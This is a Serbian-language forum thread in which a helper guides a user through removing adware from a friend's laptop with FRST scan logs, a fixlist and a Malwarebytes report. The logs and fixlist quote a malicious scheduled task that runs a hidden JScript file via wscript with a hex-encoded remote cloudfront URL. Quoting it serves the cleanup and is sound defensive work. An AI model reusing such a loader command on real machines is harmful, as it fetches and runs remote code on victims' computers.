Usporen i verovatno zaražen laptop

Usporen i verovatno zaražen laptop

offline
  • RJ 
  • SuperModerator
  • Supermoderator vojnih foruma
  • Gavrilo Milentijević
  • Komandir stanice milicije Gornje Polje
  • Pridružio: 12 Feb 2005
  • Poruke: 7544
  • Gde živiš: ovalni kabinet

Ovo nije moj laptop već od prijatelice - izuzetno je spor, jedva otvara pretraživač (Google prepoznaje kao opasnu stranicu) i svaki program koji se skine takođe okakarkteriše potencijalno zaraženim.
Ja sam ga očistio sa Glary utilities (bilo je preko 5 gb smeća), računar nema nikakav AV program a Malwarebytes je pronašao neke gluposti ali i posle čišćenja ponaša se isto.
Evo izveštaja

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 23.08.2018
Ran by +++++++(administrator) on MIRA-PC (10-06-2018 21:23:50)
Running from C:\Users\Mira++++++\Desktop
Loaded Profiles: Mira+++++++ (Available Profiles: Mira ++++++)
Platform: Windows 10 Enterprise 10240.17071 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic/335081-frst-t.....scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Microsoft Corporation) C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MsMpEng.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\NisSrv.exe
(Microsoft Corporation) C:\Program Files\Windows Defender\MpCmdRun.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Skype Technologies S.A.) C:\Program Files (x86)\Skype\Phone\Skype.exe
(Glarysoft Ltd) C:\Program Files (x86)\Glary Utilities 5\Integrator.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
(Microsoft Corporation) C:\Windows\System32\browser_broker.exe
(Microsoft Corporation) C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
(Microsoft Corporation) C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.10240.17020_none_1152834562020692\TiWorker.exe

==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944648 2015-09-14] (Synaptics Incorporated)
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\...\Run: [Skype] => C:\Program Files (x86)\Skype\Phone\Skype.exe [27226072 2016-11-15] (Skype Technologies S.A.)
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\...\Run: [GUDelayStartup] => C:\Program Files (x86)\Glary Utilities 5\StartupManager.exe [43984 2018-08-20] (Glarysoft Ltd)
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\...\RunOnce: [Uninstall C:\Users\Mira Karanović\AppData\Local\Microsoft\OneDrive\17.3.5951.0827] => C:\Windows\system32\cmd.exe /q /c rmdir /s /q "C:\Users\Mira Karanović\AppData\Local\Microsoft\OneDrive\17.3.5951.0827"
BootExecute: autocheck autochk *

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
Tcpip\..\Interfaces\{95839d91-cfd6-48c8-91fc-5bf8eeffa38f}: [DhcpNameServer] 192.168.1.254
Tcpip\..\Interfaces\{d9ee17ee-5e39-48fc-8b6f-9a9068018bdc}: [DhcpNameServer] 192.168.1.1

Internet Explorer:
==================
HKU\S-1-5-21-1623467669-1056203944-4258781565-1001\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://google.ba/

FireFox:
========
FF DefaultProfile: mbnbvglb.default-1528653924611
FF ProfilePath: C:\Users\Mira ++++++\AppData\Roaming\Mozilla\Firefox\Profiles\mbnbvglb.default-1528653924611 [2018-06-10]
FF Homepage: Mozilla\Firefox\Profiles\mbnbvglb.default-1528653924611 -> hxxp://www.google.ba/
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_30_0_0_154.dll [2018-06-10] ()
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_30_0_0_154.dll [2018-06-10] ()
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems Inc.)

Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [lifbcibllhkdhoafpjfnlhfpfgnpldfl] - hxxps://clients2.google.com/service/update2/crx

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 SynTPEnhService; C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe [246472 2015-09-14] (Synaptics Incorporated)
R3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [362928 2015-07-10] (Microsoft Corporation)
R2 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [24856 2016-08-03] (Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

S3 dg_ssudbus; C:\Windows\system32\DRIVERS\ssudbus.sys [131712 2017-06-11] (Samsung Electronics Co., Ltd.)
R1 GUBootStartup; C:\Windows\System32\drivers\GUBootStartup.sys [28936 2018-06-10] (Glarysoft Ltd)
R1 MpKsl291be7ab; C:\ProgramData\Microsoft\Windows Defender\Definition Updates\{7F4960AB-3002-4D12-9098-BD45969A800C}\MpKsl291be7ab.sys [58120 2018-06-10] (Microsoft Corporation)
R3 smserial; C:\Windows\system32\DRIVERS\SmSerl64.sys [1227776 2015-07-10] (Motorola Inc.)
S3 UdeCx; C:\Windows\System32\drivers\udecx.sys [44032 2015-07-10] ()
S0 WdBoot; C:\Windows\System32\drivers\WdBoot.sys [44568 2015-07-10] (Microsoft Corporation)
R0 WdFilter; C:\Windows\System32\drivers\WdFilter.sys [291680 2015-07-10] (Microsoft Corporation)
R2 WdNisDrv; C:\Windows\System32\Drivers\WdNisDrv.sys [119648 2015-07-10] (Microsoft Corporation)
S3 wfpcapture; \SystemRoot\System32\drivers\wfpcapture.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)


==================== One Month Created files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-06-10 21:23 - 2018-06-10 21:25 - 000006042 _____ C:\Users\Mira Karanović\Desktop\FRST.txt
2018-06-10 21:23 - 2018-06-10 21:23 - 000000000 ____D C:\FRST
2018-06-10 21:19 - 2018-06-10 21:22 - 002413056 _____ (Farbar) C:\Users\Mira Karanović\Desktop\FRST64.exe
2018-06-10 21:13 - 2018-06-10 21:13 - 000016148 _____ C:\Windows\system32\MIRA-PC_Mira Karanović_HistoryPrediction.bin
2018-06-10 20:18 - 2018-06-10 20:20 - 000000000 ____D C:\AdwCleaner
2018-06-10 20:15 - 2018-06-10 20:17 - 007417040 _____ (Malwarebytes) C:\Users\Mira Karanović\Downloads\adwcleaner_7.2.2.exe
2018-06-10 20:05 - 2018-06-10 20:05 - 000000000 ____D C:\Users\Mira Karanović\Desktop\Old Firefox Data
2018-06-10 20:01 - 2018-06-10 20:01 - 000001220 _____ C:\Users\Public\Desktop\Firefox.lnk
2018-06-10 19:58 - 2018-06-10 19:59 - 000313768 _____ (Mozilla) C:\Users\Mira Karanović\Downloads\Firefox Installer.exe
2018-06-10 19:07 - 2018-08-20 03:44 - 000035792 _____ (Glarysoft Ltd) C:\Windows\system32\RegBootDefrag.exe
2018-06-10 18:26 - 2018-06-10 18:26 - 000001153 _____ C:\Users\Public\Desktop\Glary Utilities 5.lnk
2018-06-10 18:25 - 2018-06-10 18:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5
2018-06-10 18:25 - 2018-06-10 18:25 - 000028936 _____ (Glarysoft Ltd) C:\Windows\system32\Drivers\GUBootStartup.sys
2018-06-10 18:25 - 2018-06-10 18:25 - 000003290 _____ C:\Windows\System32\Tasks\GlaryInitialize 5
2018-06-10 18:25 - 2018-06-10 18:25 - 000001165 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Glary Utilities 5.lnk
2018-06-10 18:25 - 2018-06-10 18:25 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\GlarySoft
2018-06-10 18:25 - 2018-06-10 18:25 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\DiskDefrag
2018-06-10 18:25 - 2018-06-10 18:25 - 000000000 ____D C:\Program Files (x86)\Glary Utilities 5
2018-06-10 17:57 - 2018-06-10 17:57 - 021360640 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\FlashPlayerInstaller.exe
2018-06-10 17:54 - 2018-06-10 17:58 - 017229968 _____ (Glarysoft Ltd) C:\Users\Mira Karanović\Downloads\gu5setup.exe

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-06-10 21:14 - 2015-09-14 11:07 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\Skype
2018-06-10 21:13 - 2018-04-27 21:13 - 000000600 _____ C:\Windows\Tasks\Chromium dacir.job
2018-06-10 21:13 - 2018-04-27 21:13 - 000000382 _____ C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job
2018-06-10 20:35 - 2016-11-18 18:41 - 000000000 ____D C:\Users\Mira Karanović\AppData\LocalLow\Mozilla
2018-06-10 20:21 - 2015-09-14 10:47 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-06-10 20:21 - 2015-07-10 14:21 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2018-06-10 20:21 - 2015-07-10 11:05 - 000262144 ___SH C:\Windows\system32\config\BBI
2018-06-10 20:01 - 2016-11-17 17:55 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-06-10 20:01 - 2015-09-14 10:47 - 000001232 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2018-06-10 20:01 - 2015-09-14 10:47 - 000000000 ____D C:\Users\Mira Karanović\AppData\Roaming\Mozilla
2018-06-10 19:55 - 2018-01-27 02:26 - 000000000 ____D C:\Windows10Upgrade
2018-06-10 19:30 - 2015-07-10 13:04 - 000000000 ___HD C:\Program Files\WindowsApps
2018-06-10 19:30 - 2015-07-10 13:04 - 000000000 ____D C:\Windows\AppReadiness
2018-06-10 19:15 - 2015-09-09 15:51 - 000000000 ____D C:\Users\Mira Karanović
2018-06-10 19:15 - 2015-07-10 11:05 - 086507520 _____ C:\Windows\system32\config\SOFTWARE.gu.bak
2018-06-10 19:15 - 2015-07-10 11:05 - 010223616 _____ C:\Windows\system32\config\SYSTEM.gu.bak
2018-06-10 19:15 - 2015-07-10 11:05 - 000032768 _____ C:\Windows\system32\config\SECURITY.gu.bak
2018-06-10 19:14 - 2015-07-10 12:55 - 000000000 ____D C:\Windows\CbsTemp
2018-06-10 19:14 - 2015-07-10 11:05 - 000524288 _____ C:\Windows\system32\config\DEFAULT.gu.bak
2018-06-10 18:24 - 2015-09-14 09:52 - 000004562 _____ C:\Windows\System32\Tasks\Adobe Acrobat Update Task
2018-06-10 18:21 - 2015-09-14 09:51 - 000002457 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-06-10 18:08 - 2015-09-09 15:57 - 000830266 _____ C:\Windows\system32\PerfStringBackup.INI
2018-06-10 18:08 - 2015-07-10 13:02 - 000000000 ____D C:\Windows\INF
2018-06-10 17:57 - 2018-04-27 21:10 - 000004590 _____ C:\Windows\System32\Tasks\Adobe Flash Player NPAPI Notifier
2018-06-10 17:57 - 2015-07-10 13:04 - 000000000 ____D C:\Windows\SysWOW64\Macromed
2018-06-10 17:57 - 2015-07-10 13:04 - 000000000 ____D C:\Windows\system32\Macromed
2018-06-10 16:19 - 2015-10-14 19:03 - 000004170 _____ C:\Windows\System32\Tasks\User_Feed_Synchronization-{7E69BD41-2FAA-4258-A8E4-2FB2496F8AD2}
2018-06-10 16:13 - 2018-04-27 21:13 - 000000000 ____D C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}
2018-05-12 22:42 - 2017-11-11 21:19 - 000003380 _____ C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-1623467669-1056203944-4258781565-1001
2018-05-12 22:41 - 2016-08-18 04:33 - 000002556 _____ C:\Users\Mira Karanović\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2018-05-12 22:41 - 2015-09-09 15:59 - 000000000 ___RD C:\Users\Mira Karanović\OneDrive

Files to move or delete:
====================
C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job


Some files in TEMP:
====================
2018-06-10 19:55 - 2018-06-10 19:55 - 006612768 _____ (Microsoft Corporation) C:\Users\Mira ++++++\AppData\Local\Temp\Windows10Upgrade.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-06-10 19:32

==================== End of FRST.txt ============================

https://www.mycity.rs/must-login.png

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10455
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Otvori Notepad i iskopiraj sljedeći tekst koji se nalazi unutar Kod polja.

C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job
Task: {7A7325E2-31C1-49B3-B359-67FC292D11CA} - System32\Tasks\Chromium dacir => C:\Windows\system32\wscript.exe "C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt" "68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk" <==== ATTENTION
Task: C:\Windows\Tasks\Chromium dacir.job => C:\Windows\system32\wscript.ex C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt <==== ATTENTION
Task: C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job => C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe <==== ATTENTION
VirusTotal: C:\Windows\system32\wscript.ex;C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt
C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
EmptyTemp:


U okviru Notepad-a klikni na File --> Save As
Pod Encoding izaberi UTF-8.
Fajl nazovi Fixlist i sačuvaj na Desktop
Dvoklikom ponovo pokreni FRST.exe
Klikni na Fix i sačekaj dok program ne završi.
Ukoliko program zatraži restart računara, omogući mu da to nesmetano obavi.
Nakon završetka rada, otvoriće se fixlog.txt, sa sadržajem koji treba da kopiraš u temu.
Takođe, na Desktop-u će se nalaziti (fixlog.txt).

offline
  • RJ 
  • SuperModerator
  • Supermoderator vojnih foruma
  • Gavrilo Milentijević
  • Komandir stanice milicije Gornje Polje
  • Pridružio: 12 Feb 2005
  • Poruke: 7544
  • Gde živiš: ovalni kabinet

Odradio sam kako si naveo - odmah da napomenem da je čitav proces predugo trajao, preko 5 minuta i posle restarta komp je i dalje užasno spor.
Evo izveštaja

by Mira Karanović (28-08-2018 13:12:25) Run:1
Running from C:\Users\Mira Karanović\Desktop
Loaded Profiles: Mira Karanović & (Available Profiles: Mira Karanović)
Boot Mode: Normal
==============================================

fixlist content:
*****************
C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job
Task: {7A7325E2-31C1-49B3-B359-67FC292D11CA} - System32\Tasks\Chromium dacir => C:\Windows\system32\wscript.exe "C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt" "68747470733a2f2f64326234366537617832617466692e636c6f756466726f6e742e6e6574" "//B" "//E:jscript" "--IsErIk" <==== ATTENTION
Task: C:\Windows\Tasks\Chromium dacir.job => C:\Windows\system32\wscript.ex C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt <==== ATTENTION
Task: C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job => C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe <==== ATTENTION
VirusTotal: C:\Windows\system32\wscript.ex;C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt
C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe
EmptyTemp:
*****************

C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A7325E2-31C1-49B3-B359-67FC292D11CA} => not found
"C:\Windows\System32\Tasks\Chromium dacir" => not found
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chromium dacir => not found
"C:\Windows\Tasks\Chromium dacir.job" => not found
"C:\Windows\Tasks\{0CA4F43F-DE52-C713-44B9-735A7C8D7ADA}.job" => not found
"VirusTotal: C:\Windows\system32\wscript.ex" => not found
"VirusTotal: C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe" => not found
"C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt" => not found
"C:\Users\Mira Karanovic\AppData\Roaming\0CA4F43F-DE52-C713-44B9-735A7C8D7ADA\SyncTask.exe" => not found

=========== EmptyTemp: ==========

BITS transfer queue => 294335 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 9487757 B
Java, Flash, Steam htmlcache => 10596 B
Windows/system/drivers => 167847014 B
Edge => 2653483 B
Chrome => 0 B
Firefox => 51702163 B
Opera => 0 B

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10455
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Preuzmi Malwarebytes Anti-Malware sa ovog ili ovog ili ovog linka i instaliraj aplikaciju.
Pokreni mb3-setup-consumer-{verzija}.exe i isprati uputstva za instalaciju programa. Nakon instalacije, klikni na Finish

Prilikom prvog pokretanja, program će prikazati prozor "dobrodošlice". Slobodno zatvori taj prozor.
Napomena: Premium funkcije programa su već aktivirane i važe 13 dana od trenutka instalacije. Premium funkcije možeš isključiti preko Settings > My Account tab podešavanja.

• Podešavanja skenera - u Settings, klikni na Protection tab. Ispod Scan Options sekcije, uključi "Scan for rootkits" opciju.
• Pripremi podešavanja za Threat Scan - u Dashboard , klikni na Scan Now dugme. MBAM će ažurirati bazu i započeti skeniranje.

Kada se skeniranje završi, ako je infekcija detektovana, obrati pažnju da je sve označeno, pa klikni na Remove Selected. Restartuj računar ako program upita za restart.
• Dostavi log: Pod Reports izaberi trenutni datum izveštaja Scan Report i potom klikni na View Report.

Izvezi log na Desktop;
- Klikni na Export dugme na dnu, pa onda izaberi 'Text file (*.txt)'
# U Save File dijalogu koji se pojavi, klikni na Desktop. U File name: polje, upiši "mbam" (bez navodnika) i klikni na Save.
- Pojaviće se poruka "Your file has been successfully exported", klikni Ok i zatvori prozor.



• U odgovoru prikači mbam.txt log koristeći "Prikači fajl" opciju.

offline
  • RJ 
  • SuperModerator
  • Supermoderator vojnih foruma
  • Gavrilo Milentijević
  • Komandir stanice milicije Gornje Polje
  • Pridružio: 12 Feb 2005
  • Poruke: 7544
  • Gde živiš: ovalni kabinet

Ja sam upravo jutros instalirao Mbam sa prvog ponuđenog linka i izvršio scan (bez ovog "scan for rootkits") i tu je bilo nekih pretnji - evo izveštaj iz karantina.
Malo pre sam odradio scan po tvom uputstvu, ništa nije nađeno.

offline
  • RJ 
  • SuperModerator
  • Supermoderator vojnih foruma
  • Gavrilo Milentijević
  • Komandir stanice milicije Gornje Polje
  • Pridružio: 12 Feb 2005
  • Poruke: 7544
  • Gde živiš: ovalni kabinet

PUM: Detect

-Scan Details-
Process: 0
(No malicious items detected)

Module: 0
(No malicious items detected)

Registry Key: 6
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TREE\Chromium dacir, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\PLAIN\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Chromium dacir, Quarantined, [3728], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [-1],0.0.0
PUP.Optional.WinYahoo.TskLnk, HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7A7325E2-31C1-49B3-B359-67FC292D11CA}, Quarantined, [3728], [-1],0.0.0

Registry Value: 1
PUP.Optional.WinYahoo.Generic, HKLM\SOFTWARE\MICROSOFT\WINDOWS NT\CURRENTVERSION\SCHEDULE\TASKCACHE\TASKS\{7A7325E2-31C1-49B3-B359-67FC292D11CA}|PATH, Quarantined, [3756], [483378],1.0.6535

Registry Data: 0
(No malicious items detected)

Data Stream: 0
(No malicious items detected)

Folder: 1
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}, Quarantined, [3728], [453921],1.0.6535

File: 17
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\TASKS\Chromium dacir.job, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\Chromium dacir, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\PROGRAMDATA\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\lasa.txt, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\aowLC, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\hdat1, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\hdat2, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\ProgramData\{7B1BBE78-F159-34BE-779F-AAFCEDDD2132}\yjUzk, Quarantined, [3728], [453921],1.0.6535
PUP.Optional.WinYahoo.TskLnk, C:\WINDOWS\SYSTEM32\TASKS\Chromium dacir, Quarantined, [3728], [-1],0.0.0
PUP.Optional.BundleInstaller, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_1895291026.EXE, Quarantined, [409], [483914],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (2).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (1).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (3).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (4).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648.EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_1463148242.EXE, Quarantined, [401], [482986],1.0.6535
PUP.Optional.InstallCore, C:\USERS\MIRA KARANOVIć\DOWNLOADS\ADOBE_FLASH_SETUP_2040931648 (5).EXE, Quarantined, [401], [484753],1.0.6535
PUP.Optional.BundleInstaller, C:\USERS\MIRA KARANOVIć\DOWNLOADS\JAVASETUP_0351522482.EXE, Quarantined, [409], [517962],1.0.6535

Physical Sector: 0
(No malicious items detected)

WMI: 0
(No malicious items detected)


(end)

offline
  • Pridružio: 26 Avg 2010
  • Poruke: 10455
  • Gde živiš: Hypnos Control Room, Tokyo Metropolitan Government Building

Kakvo je sad stanje?

Postavi mi nove FRST.txt i Addition.txt izvještaje.

offline
  • RJ 
  • SuperModerator
  • Supermoderator vojnih foruma
  • Gavrilo Milentijević
  • Komandir stanice milicije Gornje Polje
  • Pridružio: 12 Feb 2005
  • Poruke: 7544
  • Gde živiš: ovalni kabinet

Na žalost,ne mogu- ovo sam pokušao da rešim jer sam bio nekoliko dana kod prijateljice jer sam video da joj je laptop skoro pa mrtav.
Ono poslednje juče što sam video je da je malo živnuo.
Mislim da je koliko toliko problem rešen,u svakom slučaju hvala na trudu Wink

Ko je trenutno na forumu
 

Ukupno su 187 korisnika na forumu :: 4 registrovanih, 0 sakrivenih i 183 gosta   ::   [ Administrator ] [ Supermoderator ] [ Moderator ] :: Detaljnije

Najviše korisnika na forumu ikad bilo je 2413 - dana 03 Okt 2019 05:07

Korisnici koji su trenutno na forumu:
Korisnici trenutno na forumu: BlekMen, cikadeda, nikolaradukic103, nuke92